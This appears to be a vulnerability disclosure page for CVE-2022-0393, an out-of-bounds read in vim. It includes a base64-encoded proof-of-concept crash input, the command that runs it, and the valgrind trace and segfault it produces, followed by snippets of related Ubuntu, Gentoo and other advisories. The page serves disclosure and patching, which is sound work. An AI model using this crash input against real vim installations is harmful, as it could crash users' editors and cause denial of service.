Headline
CVE-2022-0393: Out-of-bounds Read in vim
Out-of-bounds Read in GitHub repository vim/vim prior to 8.2.
Description
Out of bound 1 byte read in vim.
commit : 06b77229ca704d00c4f138ed0377556e54d5851f
Proof of Concept
$ echo -ne "c2lsMG5vcm0WcTAHMA==" | base64 -d > minimized_poc
# valgrind
$ ./vg-in-place -s ./vim -u NONE -i NONE -n -X -Z -e -s -S ./minimized_poc -c ":qa!"
==3442167== Invalid read of size 1
==3442167== at 0x4842646: strlen (vg_replace_strmem.c:494)
==3442167== by 0x1FFD1F: delete_buff_tail (getchar.c:255)
==3442167== by 0x2017AE: ungetchars (getchar.c:1350)
==3442167== by 0x263B20: normal_cmd (normal.c:1065)
==3442167== by 0x1D465B: exec_normal (ex_docmd.c:8629)
==3442167== by 0x1D459F: exec_normal_cmd (ex_docmd.c:8592)
==3442167== by 0x1D43AD: ex_normal (ex_docmd.c:8510)
==3442167== by 0x1C945C: do_one_cmd (ex_docmd.c:2567)
==3442167== by 0x1C66E7: do_cmdline (ex_docmd.c:993)
==3442167== by 0x2F670E: do_source (scriptfile.c:1512)
==3442167== by 0x2F5B5A: cmd_source (scriptfile.c:1098)
==3442167== by 0x2F5B9F: ex_source (scriptfile.c:1124)
==3442167== Address 0x8 is not stack'd, malloc'd or (recently) free'd
==3442167==
==3442167==
==3442167== Process terminating with default action of signal 11 (SIGSEGV): dumping core
==3442167== at 0x4A2755B: kill (syscall-template.S:78)
==3442167== by 0x28FE95: may_core_dump (os_unix.c:3510)
==3442167== by 0x28FE49: mch_exit (os_unix.c:3476)
==3442167== by 0x40A23D: getout (main.c:1721)
==3442167== by 0x25302A: preserve_exit (misc1.c:2194)
==3442167== by 0x28E405: deathtrap (os_unix.c:1156)
==3442167== by 0x4A2720F: ??? (in /usr/lib/x86_64-linux-gnu/libc-2.31.so)
==3442167== by 0x4842645: strlen (vg_replace_strmem.c:494)
==3442167== by 0x1FFD1F: delete_buff_tail (getchar.c:255)
==3442167== by 0x2017AE: ungetchars (getchar.c:1350)
==3442167== by 0x263B20: normal_cmd (normal.c:1065)
==3442167== by 0x1D465B: exec_normal (ex_docmd.c:8629)
==3442167==
==3442167== HEAP SUMMARY:
==3442167== in use at exit: 99,976 bytes in 455 blocks
==3442167== total heap usage: 984 allocs, 529 frees, 209,822 bytes allocated
==3442167==
==3442167== LEAK SUMMARY:
==3442167== definitely lost: 1,232 bytes in 1 blocks
==3442167== indirectly lost: 0 bytes in 0 blocks
==3442167== possibly lost: 0 bytes in 0 blocks
==3442167== still reachable: 98,744 bytes in 454 blocks
==3442167== suppressed: 0 bytes in 0 blocks
==3442167== Rerun with --leak-check=full to see details of leaked memory
==3442167==
==3442167== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
==3442167==
==3442167== 1 errors in context 1 of 1:
==3442167== Invalid read of size 1
==3442167== at 0x4842646: strlen (vg_replace_strmem.c:494)
==3442167== by 0x1FFD1F: delete_buff_tail (getchar.c:255)
==3442167== by 0x2017AE: ungetchars (getchar.c:1350)
==3442167== by 0x263B20: normal_cmd (normal.c:1065)
==3442167== by 0x1D465B: exec_normal (ex_docmd.c:8629)
==3442167== by 0x1D459F: exec_normal_cmd (ex_docmd.c:8592)
==3442167== by 0x1D43AD: ex_normal (ex_docmd.c:8510)
==3442167== by 0x1C945C: do_one_cmd (ex_docmd.c:2567)
==3442167== by 0x1C66E7: do_cmdline (ex_docmd.c:993)
==3442167== by 0x2F670E: do_source (scriptfile.c:1512)
==3442167== by 0x2F5B5A: cmd_source (scriptfile.c:1098)
==3442167== by 0x2F5B9F: ex_source (scriptfile.c:1124)
==3442167== Address 0x8 is not stack'd, malloc'd or (recently) free'd
==3442167==
==3442167== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault
Occurrences
Related news
Ubuntu Security Notice 6195-1 - It was discovered that Vim contained an out-of-bounds read vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim did not properly manage memory when freeing allocated memory. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. It was discovered that Vim contained a heap-based buffer overflow vulnerability. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.